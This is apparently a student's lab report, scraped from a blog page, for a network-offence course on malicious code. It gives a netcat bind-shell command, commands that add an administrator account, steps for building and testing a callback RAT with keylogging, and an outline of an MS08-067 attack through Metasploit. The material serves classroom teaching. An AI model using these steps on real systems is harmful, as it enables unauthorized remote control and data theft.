实验四——恶意代码技术
学 号 201421430035
中国人民公安大学
Chinese people’ public security university
网络对抗技术
实验报告
实验四 |
恶意代码技术 |
学生姓名 |
刘栋梁 |
年级 |
2014级 |
区队 |
三区队 |
指导教师 |
高见 |
信息技术与网络安全学院
2017年10月29日
实验任务总纲
2016—2017 学年 第 一 学期
一、实验目的
1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.了解并熟悉常用的网络攻击工具,木马的基本功能;
3.达到巩固课程知识和实际应用的目的。
二、实验要求
1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。
2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。
3.软件工具可使用NC、MSF等。
4.实验结束后,保留电子文档。
三、实验步骤
1.准备
提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。
2.实验环境
描述实验所使用的硬件和软件环境(包括各种软件工具);
开机并启动软件office2003或2007、浏览器、加解密软件。
3.实验过程
1)启动系统和启动工具软件环境。
2)用软件工具实现实验内容。
4.实验报告
按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。
任务一 利用NC控制电脑
NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。
实验过程需要两个同学相互配合完成:
步骤一:
在受害者的机器 (同学A)
输入下面的命令:
nc.exe -l -p port -e cmd.exe 进入监听模式
步骤二:
在攻击者的机器.(同学B)
输入下面的命令:
nc ip port //连接victim_IP,然后得到一个shell。 (需要截图)
步骤三:
在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)
可以继续通过命令行做一些事情。
任务二 利用木马控制电脑
实验过程需要两个同学配合:
步骤一:
攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。
步骤二:
点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。
步骤三:
将生成的木马可执行程序拷贝到受害者的机器,并双击运行。
步骤四:
在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。
- 文件管理,尝试拷贝文件
利用传输功能拷贝文件
- 屏幕控制,尝试获取桌面
- 键盘记录,尝试获取对方击键记录
- 会话管理,重启对方机器,查看是否能自启动上线
会话管理,卸载对方的木马。
任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客
windows ms08067 漏洞利用
在平台中获取shell之后,继续利用攻击机器使用
net user user pass /add
net localgroup administrators /add
命令向被攻击的机器中添加账户,并提升为管理员
然后用rdesktop 10.1.1.130 登陆对方的远程桌面
关闭xp系统主机的防火墙
查看攻击主机的ip地址和账户
启动Armitage
检索10.1.1.0/24网段
对130进行检测
搜寻到适应的攻击模块
配置攻击信息
利用Metasploit shall获得xp主机的管理员权限
利用cmd shall建立attacker的账户
利用rdesktop远程登录xp系统的attacker(密码:123465)
转载于:https://www.cnblogs.com/P201421430035/p/7750953.html
实验四——恶意代码技术相关推荐
- 实验四 恶意代码技术
学 号201421460014 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学 ...
- 实验四 恶意代码技术
实验报告 四 学 号 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 ...
- 实验四恶意代码分析技术 201421430029
学 号:201421430029 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 实验四 恶意代码
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 冷其航 年级 14级 区队 ...
- 20155222卢梓杰 实验四 恶意代码分析
实验四 恶意代码分析 1.系统运行监控 实验步骤如下 1.使用批处理监控程序连接网络的状况 在C盘要目录下建一个文件c:\netstatlog.bat,内容如下: date /t >> c ...
- 20155235 《网络攻防》 实验四 恶意代码分析
20155235 <网络攻防> 实验四 恶意代码分析 实验目的 是监控你自己系统的运行状态,看有没有可疑的程序在运行. 是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具 ...
- 20145231熊梓宏 《网络对抗》 实验四 恶意代码分析
20145231熊梓宏 <网络对抗> 实验四 恶意代码分析 基础问题回答 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操 ...
- 第四次实验 恶意代码技术
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 金轩宇 年级 2015 区队 ...
- 网络对抗技术——实验四:恶意代码技术
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 王天宇 年级 2015级 ...
最新文章
- java获取mysql数据定时执行_详解SpringBoot 创建定时任务(配合数据库动态执行)...
- PDF.NET数据开发框架实体类操作实例(for PostgreSQL,并且解决自增问题)
- Java 程序员必备的 Intellij IDEA 插件
- bind-utils.x86_64(dig) 安装失败解决办法
- 新疆计算机二级慨库,2020新疆维吾尔自治区计算机二级易考套餐:二级MS Office高级应用全程班(网课+题库+教材)...
- 单链表的初始化,整表创建,单个元素插入,单个元素删除,整表删除等操作...
- html如何设置三列列宽相等,CSS分割宽度100%到3列
- 扩展吉日嘎拉的用户角色管理,让用户角色编码和名称在一个组织里面唯一
- Python装饰器几个有用又好玩的例子
- 中南大学oj:1352: New Sorting Algorithm
- 抽象工厂模式---创建型
- 计算机专业 美国,美国计算机专业的五大名校概况
- Django(二):安装django、创建项目及目录结构说明、在pycharm中搭建
- Sketch79 mac专业矢量绘图设计
- 获取每周第一天和最后一天
- Ubuntu硬盘的分区、格式化、挂载
- 【一起入门NLP】中科院自然语言处理第13课-NLP基础任务④:序列生成问题(Seq2Seq)
- 自制批量 PDF 转图片的工具软件(附百度网盘地址)
- makex机器人程序_MakeX总决赛现场参赛选手在进行机器人编程
- 【Qt】动态刷新lcdNumber显示的值
热门文章
- Scrum立会报告+燃尽图(十月十日总第一次):选题
- html5类选择器用什么表示,HTML_揭秘常用的五类CSS选择器用法,有许多新手朋友不知道在什么 - phpStudy...
- No Security No Safety!——基于Hypervisor技术的车联网安全网关基础平台
- linux系统安装telnet服务
- 运营商大数据的发展现状和趋势
- CentOS6怎样开启MySQL远程访问
- c语言位运算负数的实例_巧妙运用C语言位运算
- linux升级内核ivh,Linux内核升级
- 408计算机学科专业基础综合——操作系统
- Pygame实战:预防老年痴呆,写个Python小游戏来锻炼大脑!!!